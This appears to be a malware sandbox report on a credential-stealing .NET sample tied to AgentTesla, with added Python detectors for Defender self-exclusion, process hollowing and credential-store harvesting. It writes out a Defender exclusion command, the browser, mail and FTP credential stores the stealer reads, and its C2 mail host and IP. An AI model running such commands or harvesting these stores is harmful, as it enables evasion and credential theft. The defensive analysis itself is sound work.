                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Users\user\Desktop\order2024-10-07_174915.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
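Two of the rows above carry the whole evasion story: the sample launches powershell.exe to run Add-MpPreference -ExclusionPath on its own image, and it spawns a second copy of itself and writes a PE header (bytes 4D5A, "MZ") at base 0x400000 into that copy before the child's real code ever runs. Both are easy to miss in a raw event stream, the first one especially once the PowerShell script is wrapped in -EncodedCommand. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It parses constructed event lines written in an assumed "Source: <image> | <event>: <detail>" shape, decodes an -EncodedCommand payload (base64 over UTF-16LE, the encoding PowerShell expects) before matching, flags an exclusion whose path is the launching process's own image, and flags the spawn-self-then-write-MZ sequence. The report rows carry image paths but no PIDs, so "own image" is matched on path; that, the -EncodedCommand line and the conhost.exe line are assumptions of the example.

```python
"""Added example: two checks over sandbox-style process events.

1. Defender self-exclusion: powershell.exe is launched with
   Add-MpPreference -ExclusionPath <path>, plain or behind -EncodedCommand,
   and <path> is the launching process's own image.
2. Self-hollowing: a process spawns its own image and then writes an MZ
   header (bytes 4D5A) at base 0x400000 into that image's process.
"""
import base64
import re
from dataclasses import dataclass

# Constructed sample events in the assumed shape "Source: <image> | <event>: <detail>".
# Paths and the excluded path follow the report; the -EncodedCommand line and the
# conhost.exe line are assumed variants added to exercise the checks.
SAMPLE_PATH = r"C:\Users\user\Desktop\order2024-10-07_174915.exe"
POWERSHELL_PATH = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CONHOST_PATH = r"C:\Windows\System32\conhost.exe"
PLAIN_CMD = f'Add-MpPreference -ExclusionPath "{SAMPLE_PATH}"'
# PowerShell takes -EncodedCommand as base64 over the UTF-16LE script text.
ENCODED_CMD = base64.b64encode(PLAIN_CMD.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    f'Source: {SAMPLE_PATH} | Process created: {POWERSHELL_PATH} "{POWERSHELL_PATH}" {PLAIN_CMD}',
    f'Source: {SAMPLE_PATH} | Process created: {POWERSHELL_PATH} "{POWERSHELL_PATH}" -nop -w hidden -EncodedCommand {ENCODED_CMD}',
    f'Source: {SAMPLE_PATH} | Process created: {SAMPLE_PATH} "{SAMPLE_PATH}"',
    f'Source: {SAMPLE_PATH} | Memory written: {SAMPLE_PATH} base: 400000 value starts with: 4D5A',
    f'Source: {POWERSHELL_PATH} | Process created: {CONHOST_PATH} {CONHOST_PATH} 0xffffffff -ForceV1',
]

_LINE = re.compile(r"^Source: (?P<src>.+?) \| (?P<kind>Process created|Memory written): (?P<detail>.+)$")
_EXCLUSION = re.compile(r'Add-MpPreference\b.*?-ExclusionPath\s+(?:"(?P<q>[^"]+)"|(?P<u>\S+))', re.I)
_ENCODED = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+(?P<b64>[A-Za-z0-9+/=]+)", re.I)
_MEMWRITE = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<value>[0-9A-Fa-f]+)$")


@dataclass(frozen=True)
class Finding:
    rule: str
    process: str
    detail: str


def decode_encoded_command(cmdline: str) -> str:
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE);
    a command line without a decodable payload is returned unchanged."""
    m = _ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def analyse(events):
    """Findings in event order. Image paths stand in for PIDs (assumption);
    the child image is the first space-free token after 'Process created:'."""
    findings = []
    self_spawned = set()  # processes that have launched a copy of their own image
    for line in events:
        m = _LINE.match(line)
        if not m:
            continue
        src, kind, detail = m.group("src"), m.group("kind"), m.group("detail")
        if kind == "Process created":
            image, _, cmdline = detail.partition(" ")
            if image.lower().endswith("powershell.exe"):
                hit = _EXCLUSION.search(decode_encoded_command(cmdline))
                if hit:
                    path = hit.group("q") or hit.group("u")
                    rule = "defender_self_exclusion" if path.lower() == src.lower() else "defender_exclusion_added"
                    findings.append(Finding(rule, src, path))
            elif image.lower() == src.lower():
                self_spawned.add(src.lower())
        else:  # Memory written
            w = _MEMWRITE.match(detail)
            if (w and w.group("target").lower() == src.lower()
                    and src.lower() in self_spawned
                    and int(w.group("base"), 16) == 0x400000      # the base the report shows
                    and w.group("value").upper().startswith("4D5A")):  # "MZ"
                findings.append(Finding("self_hollowing", src, detail))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f.rule, f.process, f.detail)
```

A memory write of 4D5A at 0x400000 is only flagged after the same image has spawned itself, so a lone write event stays silent; on a live host the exclusion half of this is checked with Get-MpPreference (ExclusionPath) and in the Microsoft-Windows-Windows Defender/Operational log, where event ID 5007 records configuration changes such as a new exclusion. An exclusion for a file on a user's Desktop, added by a process that is itself that file, has no benign explanation.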

                      Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: order2024-10-07_174915.exe PID: 4472, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 0.2.order2024-10-07_174915.exe.450d9e0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.order2024-10-07_174915.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.order2024-10-07_174915.exe.4536a00.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.order2024-10-07_174915.exe.450d9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2501932436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (x2)
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: order2024-10-07_174915.exe PID: 4472, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
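The file and registry opens above are what the report's "Tries to harvest and steal ..." signatures key on: a single process reading the saved-login stores of several unrelated applications (Chromium and Gecko browsers, Thunderbird, Outlook, IncrediMail, FTP Navigator and WinSCP) one after the other. The Python below is an added example, not code from the report. It profiles constructed "File opened" / "Key opened" lines (the "Source: <image> | <event>: <target>" shape is assumed for the example) against the store locations the sample opened, ignores an application reading its own store, and reports which store categories every other process touched. The owning image names for Chrome, Edge, Firefox, Thunderbird, Outlook and WinSCP are the real ones; those given for Cyberfox, BlackHawk, IncrediMail and FTP Navigator, and the two control processes in the sample input, are assumptions.

```python
"""Added example: profile which saved-credential stores each process opens,
from sandbox-style "File opened" / "Key opened" events, and flag a process
that reads the stores of several unrelated applications."""
import ntpath
import re
from collections import defaultdict

# (lower-case path fragment, store category, image name of the owning application).
# Fragments are the stores the report shows the sample opening. Owner names for
# Chrome, Edge, Firefox, Thunderbird, Outlook and WinSCP are real; the other
# owner names are assumptions made for this example.
ARTIFACTS = [
    (r"\google\chrome\user data", "browser", "chrome.exe"),
    (r"\microsoft\edge\user data", "browser", "msedge.exe"),
    (r"\mozilla\firefox\profiles.ini", "browser", "firefox.exe"),
    (r"\8pecxstudios\cyberfox\profiles.ini", "browser", "cyberfox.exe"),
    (r"\netgate technologies\blackhawk\profiles.ini", "browser", "blackhawk.exe"),
    (r"\thunderbird\profiles.ini", "mail", "thunderbird.exe"),
    (r"\windows messaging subsystem\profiles\outlook", "mail", "outlook.exe"),
    (r"\incredimail\identities", "mail", "incredimail.exe"),
    (r"\ftp navigator\ftplist.txt", "ftp", "ftpnavigator.exe"),
    (r"\martin prikryl\winscp 2\sessions", "sftp", "winscp.exe"),
]

_LINE = re.compile(r"^Source: (?P<src>.+?) \| (?P<kind>File opened|Key opened): (?P<target>.+)$")

SAMPLE_PATH = r"C:\Users\user\Desktop\order2024-10-07_174915.exe"


def event(src, kind, target):
    """Build one event line in the assumed 'Source: <image> | <event>: <target>' shape."""
    return f"Source: {src} | {kind}: {target}"


# Constructed from the opens the report lists, plus an unrelated file and two controls.
SAMPLE_EVENTS = [
    event(SAMPLE_PATH, "Key opened", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    event(SAMPLE_PATH, "File opened", r"C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini"),
    event(SAMPLE_PATH, "File opened", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    event(SAMPLE_PATH, "File opened", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    event(SAMPLE_PATH, "File opened", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    event(SAMPLE_PATH, "File opened", r"C:\FTP Navigator\Ftplist.txt"),
    event(SAMPLE_PATH, "File opened", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    event(SAMPLE_PATH, "Key opened", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    event(SAMPLE_PATH, "Key opened", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    event(SAMPLE_PATH, "File opened", r"C:\Windows\Fonts\GOTHIC.TTF"),  # not a credential store
    # Control (assumed): the browser reading its own store is normal.
    event(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "File opened",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    # Control (assumed): an unknown tool reading a single foreign store.
    event(r"C:\Temp\tool.exe", "File opened", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
]


def classify(target):
    """Map a file path or registry key to (category, owner image), or None."""
    t = target.lower()
    for needle, category, owner in ARTIFACTS:
        if needle in t:
            return category, owner
    return None


def profile(events):
    """Per process: the categories and artifacts of credential stores it opened
    that belong to another application. Two or more categories from one process
    is the stealer pattern; a single foreign read is reported at lower confidence."""
    per_proc = defaultdict(lambda: {"categories": set(), "artifacts": []})
    for line in events:
        m = _LINE.match(line)
        if not m:
            continue
        hit = classify(m.group("target"))
        if hit is None:
            continue
        category, owner = hit
        src = m.group("src")
        if ntpath.basename(src).lower() == owner:
            continue  # the owning application reading its own store
        per_proc[src]["categories"].add(category)
        per_proc[src]["artifacts"].append(m.group("target"))
    report = {}
    for src, rec in per_proc.items():
        verdict = "credential_harvesting" if len(rec["categories"]) >= 2 else "foreign_credential_store_access"
        report[src] = {"categories": sorted(rec["categories"]), "artifacts": rec["artifacts"], "verdict": verdict}
    return report


if __name__ == "__main__":
    for src, rec in profile(SAMPLE_EVENTS).items():
        print(src, rec["verdict"], rec["categories"])
```

The category threshold, not any single path, is what separates a stealer from a backup tool or a browser migration assistant: those touch one category at most. Note that the sample opens profiles.ini rather than the password database itself for the Gecko-based clients; that file is how it locates the profile directory, so it is the right thing to watch.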

                      Remote Access Functionality

Source: Yara match | File source: 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: order2024-10-07_174915.exe PID: 4472, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 0.2.order2024-10-07_174915.exe.450d9e0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.order2024-10-07_174915.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.order2024-10-07_174915.exe.4536a00.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.order2024-10-07_174915.exe.450d9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2501932436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix

Techniques with matching signatures carry the report's signature-count badge in brackets; entries without a badge are the matrix's fixed placeholder cells and had no match.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation [121]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [111]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading [1]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [141]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [12]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [2]; Credentials in Registry [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery [111]; Process Discovery [1]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [24]; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Email Collection [1]; Archive Collected Data [11]; Data from Local System [2]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [11]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1528372; sample: order2024-10-07_174915.exe; start date: 07/10/2024; architecture: WINDOWS; score: 100)

Start
  DNS/IP: mail.mbarieservicesltd.com; 18.31.95.13.in-addr.arpa
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 8 other signatures
  -> order2024-10-07_174915.exe (started)
       Dropped: C:\Users\...\order2024-10-07_174915.exe.log, ASCII
       Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
       -> order2024-10-07_174915.exe (started; the instance that performs the credential theft and the network traffic)
            Network: mail.mbarieservicesltd.com 199.79.62.115, TCP 49704 -> 587, PUBLIC-DOMAIN-REGISTRYUS, United States
            Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
       -> powershell.exe (started)
            Signatures: Loading BitLocker PowerShell Module
            -> WmiPrvSE.exe (started)
            -> conhost.exe (started)
       -> order2024-10-07_174915.exe (started)

Source | Detection | Scanner | Label | Link
order2024-10-07_174915.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal |
order2024-10-07_174915.exe | 100% | Joe Sandbox ML | |
No Antivirus matches (x3)
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.mbarieservicesltd.com | 199.79.62.115 | true | true | | unknown
18.31.95.13.in-addr.arpa | unknown | unknown | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | order2024-10-07_174915.exe, 00000000.00000002.1277438548.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.mbarieservicesltd.com | order2024-10-07_174915.exe, 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
199.79.62.115 | mail.mbarieservicesltd.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528372
Start date and time: 2024-10-07 21:17:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: order2024-10-07_174915.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/6@2/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 142
• Number of non-executed functions: 11
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: order2024-10-07_174915.exe
Time | Type | Description
15:18:08 | API Interceptor | 21x Sleep call for process: order2024-10-07_174915.exe modified
15:18:10 | API Interceptor | 19x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
199.79.62.115 | PO23100070.exe | malicious | AgentTesla |
199.79.62.115 | PO-000001488.exe | malicious | AgentTesla |
199.79.62.115 | Quote 20240533-REV2.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | PO- 220135.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | Quote_4400201477.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | 1460531MES_S Quote.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | QUOTE-4K148388-A-C334.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | PO# 81136575.exe | malicious | AgentTesla, PureLog Stealer |
199.79.62.115 | PO_GM_list_30082024202003180817418300824.exe | malicious | AgentTesla |
199.79.62.115 | QUOTE-4K892388-A-C422.exe | malicious | AgentTesla |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
mail.mbarieservicesltd.com | PO23100070.exe | malicious | AgentTesla | 199.79.62.115
mail.mbarieservicesltd.com | PO-000001488.exe | malicious | AgentTesla | 199.79.62.115
mail.mbarieservicesltd.com | Quote 20240533-REV2.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
mail.mbarieservicesltd.com | PO- 220135.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
mail.mbarieservicesltd.com | Quote_4400201477.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
mail.mbarieservicesltd.com | 1460531MES_S Quote.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
mail.mbarieservicesltd.com | QUOTE-4K148388-A-C334.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
mail.mbarieservicesltd.com | PO# 81136575.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115

Match | Associated Sample Name / URL | Detection | Threat Name | Context
PUBLIC-DOMAIN-REGISTRYUS | shipping.exe | malicious | AgentTesla | 207.174.215.249
PUBLIC-DOMAIN-REGISTRYUS | rInvoiceCM60916_xlx.exe | malicious | FormBook | 119.18.54.27
PUBLIC-DOMAIN-REGISTRYUS | Pending invoices.exe | malicious | FormBook | 119.18.54.27
PUBLIC-DOMAIN-REGISTRYUS | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook | 119.18.54.27
PUBLIC-DOMAIN-REGISTRYUS | ENQUIRY NEED QUOTATION.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | New order.exe | malicious | AgentTesla | 207.174.215.249
PUBLIC-DOMAIN-REGISTRYUS | https://octo9.com.ng/Greula/ | malicious | Unknown | 208.91.199.242
PUBLIC-DOMAIN-REGISTRYUS | https://hegekaka.za.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFNUpaM1U9JnVpZD1VU0VSMTYwOTIwMjRVMjMwOTE2MTk=N0123N | malicious | Unknown | 119.18.48.45
PUBLIC-DOMAIN-REGISTRYUS | Payment Advice - Advice Ref pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | New order.exe | malicious | AgentTesla | 207.174.215.249
Process: C:\Users\user\Desktop\order2024-10-07_174915.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
